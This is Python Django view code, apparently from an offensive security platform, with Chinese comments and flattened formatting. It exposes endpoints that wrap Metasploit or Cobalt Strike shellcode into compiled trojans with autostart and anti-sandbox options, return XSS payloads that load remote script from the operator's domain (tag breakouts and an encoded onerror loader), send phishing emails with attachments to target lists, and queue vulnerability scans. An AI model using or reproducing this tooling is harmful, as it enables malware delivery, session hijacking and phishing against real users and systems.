Token=json.loads(request.body)["token"] # ShellcodeName = json.loads(request.body)["shellcode_name"] # 项目名字 # Shellcode = json.loads(request.body)["shellcode"]#shellcode字符串 # ShellcodeType = json.loads(request.body)["shellcode_type"] #用来辨别MSF 还是CS # ShellcodeArchitecture = json.loads(request.body)["shellcode_architecture"] # 架构类型 X86或者X64 # Plugin = json.loads(request.body)["plugin"] # 当前shellcode使用的插件 # AutoStartFunction = json.loads(request.body)["auto_start_function"]# 获取自启动函数,如果空表明不传入 # AntiSandboxFunction = json.loads(request.body)["anti_sandbox_function"] # 获取自启动函数,如果空表明不传入 # Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID # if Uid != None: # 查到了UID # UserOperationLogRecord(request, request_api="shellcode_to_trojan", uid=Uid) # TrojanModulesFilePath=GetTrojanModulesFilePath().Result()#获取插件文件夹 # PluginList = os.listdir(TrojanModulesFilePath)#获取文件夹中全部文件 # try: # if ShellcodeName=="":#判断是否有名字 # return JsonResponse({'message': "未传入项目名称!", 'code': 410, }) # if not (set(AutoStartFunction) < set(AutoStart().__Method__)):#判断是否是子集,如果是c # return JsonResponse({'message': "传入自启函数并不在可调用列表中ლ(•̀ _ •́ ლ)", 'code': 402, }) # elif not (set(AntiSandboxFunction) < set(AntiSandbox().__Method__)): # return JsonResponse({'message': "传入反沙箱函数并不在可调用列表中ლ(•̀ _ •́ ლ)", 'code': 405, }) # else: # if Plugin.endswith(".py") and (Plugin in PluginList):#判断传入的是否是python插件,并且插件名称是否在列表中 # try: # DynamicLoadingPluginPath = 'Web.TrojanOrVirus.Modules' + "." + Plugin.split('.')[0] # 去除.py后缀然后进行路径拼接 # ScriptModule = importlib.import_module(DynamicLoadingPluginPath) # 动态载入插件 # TempFilePath = GetTempFilePath().Result() # temp文件路径 # RandomName = randoms().EnglishAlphabet(5) + str(int(time.time())) # 随机名称 # VirusOriginalFilePath = TempFilePath + RandomName + ScriptModule.__language__ # 病毒原始文件名,后缀从插件中获取 # VirusFileStoragePath = GetTrojanFilePath().Result() # 病毒文件存放路径 # VirusFileGenerationPath = VirusFileStoragePath + RandomName + ScriptModule.__process__ # 病毒文件生成路径 # Include="" # FunctionName="" # Code= "" # for x in AutoStartFunction: # if x.split('2')[-1]=="c" or x.split('2')[-1]=="cpp": # if ScriptModule.__language__.split(".")[1]=="c" or ScriptModule.__language__.split(".")[1]=="cpp": # continue # elif x.split('2')[-1] !=ScriptModule.__language__.split(".")[1]:#获取语言类型进行判断 # return JsonResponse({'message': "自启动函数代码与插件语言类型不符ლ(•̀ _ •́ ლ)", 'code': 406, }) # for q in AntiSandboxFunction: # if q.split('2')[-1] == "c" or q.split('2')[-1] == "cpp": # if ScriptModule.__language__.split(".")[1] == "c" or ScriptModule.__language__.split(".")[1] == "cpp": # continue # elif q.split('2')[-1] != ScriptModule.__language__.split(".")[1]: # 获取语言类型进行判断 # return JsonResponse({'message': "反沙盒函数代码与插件语言类型不符ლ(•̀ _ •́ ლ)", 'code': 407, }) # # try: # for w in AutoStartFunction: # 进行动态调用 # Return=getattr(AutoStart(), w)()#动态调用类中的方法 # Include+=Return[0] # FunctionName+=Return[1] # Code+=Return[2] # except Exception as e: # ErrorLog().Write( # "Web_TrojanOrVirus_TrojanInterface_ShellcodeToTrojan(def)-AutoStartFunction-getattr", e) # return JsonResponse({'message': "呐呐呐!AutoStartFunction中getattr函数错误~", 'code': 408, }) # try: # for e in AntiSandboxFunction: # 进行动态调用 # Return=getattr(AntiSandbox(), e)()#动态调用类中的方法 # Include+=Return[0] # FunctionName+=Return[1] # Code+=Return[2] # except Exception as e: # ErrorLog().Write( # "Web_TrojanOrVirus_TrojanInterface_ShellcodeToTrojan(def)-AntiSandboxFunction-getattr", e) # return JsonResponse({'message': "呐呐呐!AntiSandboxFunction中getattr函数错误~", 'code': 409, }) # # #需要判断语言类型然后对应不同的生成方式 # if sys.platform == "win32": # # windows的暂时没测试 # return JsonResponse({'message': "暂不支持Windows免杀方式~敬请关注后续更新", 'code': 601, }) # elif sys.platform == "darwin" or sys.platform == "linux":#判断当前运行的机器类型 # File = open(VirusOriginalFilePath, "w+") # File.write(ScriptModule.main(shellcode=Shellcode,include=Include,all_code=Code,all_function_name=FunctionName))#获取shellcode传入动态调用函数中,然后写入本地文件 # File.close() # if ShellcodeArchitecture!="x86" and ShellcodeArchitecture!="x64":#判断对应架构 # return JsonResponse({'message': "暂不支持其他架构~", 'code': 440, }) # # elif ShellcodeArchitecture=="x86" or ShellcodeArchitecture=="x64": # Command=Language2Command["linux"][ScriptModule.__language__.split('.')[1]][ShellcodeArchitecture][ScriptModule.__process__.split('.')[1]]#通过文件中的语言类型和生成文件进行提取命令 # if Command==None: # return JsonResponse({'message': "呐呐呐!该种组合无法进行编译,请使用其他插件~", 'code': 450, }) # elif len(ScriptModule.__build__)>0:#判断有没有在原始编译命令上新增的编译操作 # # if Command.find(" -o ")!=-1:#提取输出命令 # Command=Command.replace(" -o "," "+ScriptModule.__build__+" -o ") # elif Command.find(" --out:")!=-1:#提取输出命令 # Command = Command.replace(" --out:", " " + ScriptModule.__build__ + " --out:") # # CompleteCommand=Command + VirusFileGenerationPath +" "+VirusOriginalFilePath #进行命令拼接 # RedisCompileCodeTask=CompileCode.delay(CompleteCommand) # TrojanData().Write(uid=Uid, shellcode_type=ShellcodeType,shellcode_name=ShellcodeName, # trojan_original_file_name=RandomName + ScriptModule.__language__, # trojan_generate_file_name=RandomName + ScriptModule.__process__, compilation_status="0", # redis_id=RedisCompileCodeTask.task_id, # shellcode_architecture=ShellcodeArchitecture, # plugin=ScriptModule.__heading__) # # return JsonResponse({'message': "宝贝任务已下发~", 'code': 200, }) # else: # return JsonResponse({'message': "你的电脑不是Mac或者Linux无法使用该功能ლ(•̀ _ •́ ლ)", 'code': 600, }) # except Exception as e: # ErrorLog().Write("Web_TrojanOrVirus_TrojanInterface_ShellcodeToTrojan(def)-Plugin", e) # return JsonResponse({'message': "呐呐呐!你这插件有问题呀!快上服务器看看是不是写错了", 'code': 197, }) # else: # return JsonResponse({'message': "小伙子不要搞事情嗷,你不看看插件是否传入正确ლ(•̀ _ •́ ლ)", 'code': 430, }) # # except Exception as e: # ErrorLog().Write("Web_TrojanOrVirus_TrojanInterface_ShellcodeToTrojan(def)-TrojanClass", e) # return JsonResponse({'message': "呐呐呐!未知错误內~", 'code': 161, }) # else: # return JsonResponse({'message': "小宝贝这是非法请求哦(๑•̀ㅂ•́)و✧", 'code': 403, }) # except Exception as e: # ErrorLog().Write("Web_TrojanOrVirus_TrojanInterface_ShellcodeToTrojan(def)", e) # return JsonResponse({'message': "呐呐呐!莎酱被玩坏啦(>^ω^<)", 'code': 169, }) # else: # return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def QueryProjectInfo(request): # 查询项目中详细信息 RequestLogRecord(request, request_api="query_cross_site_script_project_info") if request.method == "POST": try: ProjectAssociatedFileName = json.loads( request.body)["project_associated_file_name"] #传入项目生成的文件名 UserToken = json.loads(request.body)["token"] Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名 if Uid != None: # 查到了UID UserOperationLogRecord( request, request_api="query_cross_site_script_project_info", uid=Uid) AuthorityCheck = CrossSiteScriptProject().AuthorityCheck( uid=Uid, file_name=ProjectAssociatedFileName ) # 用来校检CrossSiteScript数据库中文件名和UID相对应 if AuthorityCheck: #判断文件是属于该用户,如果属于的话就对文件进行修改 JavaScriptFilePath = GetJavaScriptFilePath().Result( ) + ProjectAssociatedFileName #获取文件位置 ReadFileData = open(JavaScriptFilePath, 'r', encoding='UTF-8').read() #读取文件内容 return JsonResponse({ 'message': { "project_associated_file_data": base64.b64encode( str(ReadFileData).encode('utf-8')).decode( 'utf-8'), "the_first_use": """</tExtArEa>'"><sCRiPt sRC=//""" + cross_site_script_uses_domain_names + "/s/" + ProjectAssociatedFileName + "></sCrIpT>", "the_second_use": "<sCRiPt/SrC=//" + cross_site_script_uses_domain_names + "/s/" + ProjectAssociatedFileName + ">", "the_third_use": "<img sRC=//" + cross_site_script_uses_domain_names + "/s/" + ProjectAssociatedFileName + ">", "exploit_path": "//" + cross_site_script_uses_domain_names + "/s/" + ProjectAssociatedFileName, "coding_exploit": """</tEXtArEa>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22%2F%2F""" + cross_site_script_uses_domain_names + "%2Fs%2F" + ProjectAssociatedFileName + "%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>" }, 'code': 200, }) else: return JsonResponse({ 'message': "你没有查询这个项目的权限哦宝贝~", 'code': 404, }) else: return JsonResponse({ 'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write( "Web_CrossSiteScriptHub_CrossSiteScript_QueryProjectInfo(def)", e) return JsonResponse({ 'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def SendEamil(request): #查询github监控数据 RequestLogRecord(request, request_api="send_fishing_mail") if request.method == "POST": try: Token = json.loads(request.body)["token"] MailMessage = json.loads(request.body)["mail_message"] #文本内容 Attachment = json.loads(request.body)["attachment"] #附件列表 MailTitle = json.loads(request.body)["mail_title"] # 邮件标题 Sender = json.loads(request.body)["sender"] # 发送人姓名 GoalMailbox = json.loads(request.body)["goal_mailbox"] # 目标邮箱 Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="send_fishing_mail", uid=Uid) # 查询到了在计入 # 邮件内容 for Target in GoalMailbox: #像多个目标发送 try: EmailBox = MIMEMultipart() # 创建容器 EmailBox[ 'From'] = Sender + "<" + mail_user + ">" # 发送人 EmailBox['To'] = Target # 发给谁 EmailBox['Subject'] = Header(MailTitle, 'utf-8') # 标题 # 发送附件 MailAttachmentFilePath = GetMailAttachmentFilePath( ).Result() for i in Attachment: AttachmentData = MIMEApplication( open(MailAttachmentFilePath + i, 'rb').read()) AttachmentData.add_header('Content-Disposition', 'attachment', filename=i) EmailBox.attach(AttachmentData) # 消息正文 TextMessage = MIMEMultipart('alternative') EmailBox.attach(TextMessage) TextMessage.attach( MIMEText(MailMessage, 'html', 'utf-8')) # # 指定图片为当前目录 # MailImageFilePath = GetMailImageFilePath().Result() # file = open(image_file, "rb") # img_data = file.read() # file.close() # img = MIMEImage(img_data) # img.add_header('Content-ID', 'dns_config') # EmailBox.attach(img) SMTP = smtplib.SMTP() SMTP.connect(mail_host, 25) # 25 为 SMTP 端口号 SMTP.login(mail_user, mail_pass) SMTP.sendmail(mail_user, Target, EmailBox.as_string()) print("成功" + Target) SMTP.quit() SMTP.close() except Exception as e: print("失败" + Target) #到时候写数据库 return JsonResponse({ 'message': "发送失败!!", 'code': 503, }) return JsonResponse({ 'message': "发送成功~", 'code': 200, }) else: return JsonResponse({ 'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write("Web_Mail_SendEamil_SendEamil(def)", e) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def Scan(request): RequestLogRecord(request, request_api="scan") if request.method == "POST": try: ReceiveData = json.loads(request.body) ScanUrl = ReceiveData["url"] ScanToken = ReceiveData["token"] ScanModule = ReceiveData["module"] ScanThreads = ReceiveData["threads"] ScanAgentHeader = ReceiveData["header"] ScanProxy = ReceiveData["proxy"] if ScanProxy == 0: #如果传入0表示关闭该功能 ScanProxy = None if type(ScanThreads) == int: #判断类型 TokenQueryReturnValue = UserInfo().QueryTokenValidity( Token=ScanToken) if TokenQueryReturnValue: #如果Token存在 Uid = UserInfo().QueryUidWithToken( ScanToken) #如果登录成功后就来查询用户名 if Uid != None: UserOperationLogRecord(request, request_api="scan", uid=Uid) Sid = ActiveScanList().Write( uid=Uid, url=ScanUrl, proxy=ScanProxy, status=0, module=ScanModule, threads=ScanThreads) #写入用户关系表,然后返回sid下发给任务 MedusaScan.delay(ScanUrl, ScanModule, ScanThreads, ScanAgentHeader, ScanProxy, Uid=Uid, Sid=Sid) #调用扫描处理函数 return JsonResponse({ 'message': '任务下发成功👌', 'code': 200, }) else: return JsonResponse({ 'message': '诶诶诶诶???怎么会查不到用户名呢????', 'code': 404, }) else: return JsonResponse({ 'message': '请登录获取令牌秘钥~', 'code': 404, }) else: return JsonResponse({ 'message': '类型错误!', 'code': 500, }) except Exception as e: ErrorLog().Write( "Web_Api_VulnerabilityQuery_ActiveScanListQuery(def)", e) return JsonResponse({ 'message': '莎酱坏掉啦!', 'code': 500, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def ShellcodeToTrojan(request): #shellcode转换生成病毒 RequestLogRecord(request, request_api="shellcode_to_trojan") if request.method == "POST": try: Token = json.loads(request.body)["token"] Shellcode = json.loads(request.body)["shellcode"] #shellcode字符串 ShellcodeType = json.loads( request.body)["shellcode_type"] #用来辨别MSF 还是CS ShellcodeArchitecture = json.loads( request.body)["shellcode_architecture"] # 架构类型 X86或者X64 Plugin = json.loads(request.body)["plugin"] # 当前shellcode使用的插件 Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="shellcode_to_trojan", uid=Uid) TrojanModulesFilePath = GetTrojanModulesFilePath().Result( ) #获取插件文件夹 PluginList = os.listdir(TrojanModulesFilePath) #获取文件夹中全部文件 if Plugin.endswith(".py") and ( Plugin in PluginList): #判断传入的是否是python插件,并且插件名称是否在列表中 try: DynamicLoadingPluginPath = 'Web.TrojanOrVirus.Modules' + "." + Plugin.split( '.')[0] # 去除.py后缀然后进行路径拼接 ScriptModule = importlib.import_module( DynamicLoadingPluginPath) # 动态载入 TempFilePath = GetTempFilePath().Result() # temp文件路径 RandomName = randoms().EnglishAlphabet(5) + str( int(time.time())) # 随机名称 VirusOriginalFilePath = TempFilePath + RandomName + ScriptModule.__language__ # 病毒原始文件名,后缀从插件中获取 VirusFileStoragePath = GetTrojanFilePath().Result( ) # 病毒文件存放路径 VirusFileGenerationPath = VirusFileStoragePath + RandomName + ScriptModule.__process__ # 病毒文件生成路径 #需要判断语言类型然后对应不同的生成方式 if sys.platform == "win32": # windows的暂时没测试 return JsonResponse({ 'message': "暂不支持Windows免杀方式~敬请关注后续更新", 'code': 601, }) elif sys.platform == "darwin" or sys.platform == "linux": #判断当前运行的机器类型 File = open(VirusOriginalFilePath, "w+") File.write(ScriptModule.main( Shellcode)) #获取shellcode传入动态调用函数中,然后写入本地文件 File.close() if ShellcodeArchitecture != "x86" and ShellcodeArchitecture != "x64": #判断对应架构 return JsonResponse({ 'message': "暂不支持其他架构~", 'code': 440, }) elif ShellcodeArchitecture == "x86" or ShellcodeArchitecture == "x64": Command = Language2Command["linux"][ ScriptModule.__language__.split( '.')[1]][ShellcodeArchitecture][ ScriptModule.__process__.split('.') [1]] #通过文件中的语言类型和生成文件进行提取命令 if Command == None: return JsonResponse({ 'message': "呐呐呐!该种组合无法进行编译,请使用其他插件~", 'code': 450, }) else: CompleteCommand = Command + VirusFileGenerationPath + " " + VirusOriginalFilePath #进行命令拼接 RedisCompileCodeTask = CompileCode.delay( CompleteCommand) TrojanData().Write( uid=Uid, shellcode_type=ShellcodeType, trojan_original_file_name=RandomName + ScriptModule.__language__, trojan_generate_file_name=RandomName + ScriptModule.__process__, compilation_status="0", redis_id=RedisCompileCodeTask.task_id, shellcode_architecture= ShellcodeArchitecture, plugin=ScriptModule.__heading__) return JsonResponse({ 'message': "宝贝任务已下发~", 'code': 200, }) else: return JsonResponse({ 'message': "你的电脑不是Mac或者Linux无法使用该功能ლ(•̀ _ •́ ლ)", 'code': 600, }) except Exception as e: ErrorLog().Write( "Web_TrojanOrVirus_TrojanInterface_ShellcodeToTrojan(def)-Plugin", e) return JsonResponse({ 'message': "呐呐呐!你这插件有问题呀!快上服务器看看是不是写错了", 'code': 197, }) else: return JsonResponse({ 'message': "小伙子不要搞事情嗷,你不看看插件是否传入正确ლ(•̀ _ •́ ლ)", 'code': 430, }) else: return JsonResponse({ 'message': "小宝贝这是非法请求哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write( "Web_TrojanOrVirus_TrojanInterface_ShellcodeToTrojan(def)", e) return JsonResponse({ 'message': "呐呐呐!莎酱被玩坏啦(>^ω^<)", 'code': 169, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })